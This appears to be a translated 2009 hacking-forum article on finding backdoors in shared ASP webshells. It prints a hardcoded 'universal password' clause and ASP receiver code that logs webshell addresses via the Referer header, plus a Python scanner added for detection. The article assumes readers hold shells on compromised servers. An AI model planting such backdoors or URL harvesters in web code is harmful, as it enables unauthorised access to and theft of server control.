A simple ASP Trojan backdoor as an example: how to find a backdoor in an ASP Trojan

2009-07-05T00:00:00
ID MYHACK58:62200923740
Type myhack58
Reporter Anonymous
Modified 2009-07-05T00:00:00

Description

Novices like me cannot write our own ASP Trojans and can only use the ones written by experts. But the copies circulating online have passed through who knows how many hands, so it is inevitable that some ill-intentioned people will have added a backdoor inside.

Having finally obtained a shell, who would be willing to see it stolen by someone else? So after downloading an ASP Trojan, first check whether it contains a backdoor. To stay hidden, a copy with a backdoor is usually encrypted, so the first step is to decrypt it with an ASP Trojan decryption tool. After decrypting, first check for a universal password: a password that still logs in even after you have changed the Trojan's password.

Normal:

    EnD fUNCtION
    IF SEssIoN("web2a2dmin")<>UsERpaSs thEn
    IF requeSt.FoRM("pass")<>"" TheN
    iF REquesT.foRM("pass")=uSERPASS Then
    SEsSIoN("web2a2dmin")=uSERPAss
    rESPOnsE.rEdirEct Url
    ELse
    rrs"sorry,the password validation failed!"

Added universal password:

    EnD fUNCtION
    IF SEssIoN("web2a2dmin")<>UsERpaSs thEn
    IF requeSt.FoRM("pass")<>"" TheN
    iF REquesT.foRM("pass")=uSERPASS or request.form("pass")="1 1 1 1 1 1 1" Then
    SEsSIoN("web2a2dmin")=uSERPAss
    rESPOnsE.rEdirEct Url
    ELse
    rrs"sorry,the password validation failed!"

1 1 1 1 1 1 1 is the legendary universal password.

Once you have found the universal-password code, delete the clause or request.form("pass")="1 1 1 1 1 1 1" and that part is dealt with.

Next, look for a frame, the favorite way of planting a Trojan:

Once found, delete it, and the backdoor in this ASP Trojan is removed!

Next, how the backdoor works:

This is a piece of ASP "receiver" code; save it as 1.asp


The following is a quoted fragment:

    set fs=server.CreateObject("Scripting.FileSystemObject")
    set file=fs.OpenTextFile(server.MapPath("bobo.txt"),8,True)
    file.writeline url
    file.close
    set file=nothing
    set fs=nothing
    %>


What the code does: "HTTP_REFERER" is the URL of the previous page, the one that linked to the current page. Put simply, it obtains the address of a webshell and records it in the text file bobo.txt.

It is uploaded to a web space, for example <http://127.0.0.1/1.asp>

The following is a quoted fragment:


This is inserted into the ASP Trojan. Then, when someone else visits the ASP Trojan that has been planted with it, a bobo.txt is generated, and inside it is the path of that full-featured ASP webshell.
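
A check for the two things this page says to look for in a decrypted ASP file, written as an added example (not code from the original page): a password field compared against a quoted literal next to the real password variable, and a tag that loads an absolute URL and so discloses the page address through the Referer header. The names scan_asp, LITERAL_CMP, VARIABLE_CMP and REMOTE_SRC are assumptions, the input is assumed to be already decrypted, and the frame tag in the sample is constructed.

```python
import re

# request.form("field") = "literal". Case and stray whitespace are ignored
# because these files are usually case-scrambled.
LITERAL_CMP = re.compile(
    r'request\s*\.\s*form\s*\(\s*"([^"]*)"\s*\)\s*=\s*"([^"]+)"', re.I)
# request.form("field") = identifier (the configured password variable).
VARIABLE_CMP = re.compile(
    r'request\s*\.\s*form\s*\(\s*"([^"]*)"\s*\)\s*=\s*([A-Za-z_]\w*)', re.I)
# Any tag with src=<absolute URL>: fetching it sends the page URL as Referer.
REMOTE_SRC = re.compile(
    r'<\s*\w+[^>]*?\bsrc\s*=\s*["\']?(https?://[^\s"\'>]+)', re.I)


def scan_asp(source):
    """Return findings as (line_number, kind, detail) tuples."""
    findings = []
    for number, line in enumerate(source.splitlines(), 1):
        # Fields that this line already checks against a variable.
        checked = {m.group(1).lower() for m in VARIABLE_CMP.finditer(line)}
        for m in LITERAL_CMP.finditer(line):
            # A literal offered as an alternative to the variable check is
            # the universal password described above.
            kind = ("universal-password" if m.group(1).lower() in checked
                    else "literal-compare")
            findings.append((number, kind, m.group(2)))
        for m in REMOTE_SRC.finditer(line):
            findings.append((number, "remote-src", m.group(1)))
    return findings


# Constructed sample: the login checks quoted on this page plus a constructed
# frame tag (hypothetical markup, not taken from the page).
SAMPLE = '''IF requeSt.FoRM("pass")<>"" TheN
iF REquesT.foRM("pass")=uSERPASS Then
iF REquesT.foRM("pass")=uSERPASS or request.form("pass")="1 1 1 1 1 1 1" Then
<iframe src="http://127.0.0.1/1.asp"></iframe>'''

if __name__ == "__main__":
    for finding in scan_asp(SAMPLE):
        print(finding)
```

The same scan is useful on any ASP file recovered from a compromised server, since either finding means a third party can log in to the shell or learns where it is.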

We study this in order to understand it better; let's not use it to mess with novices!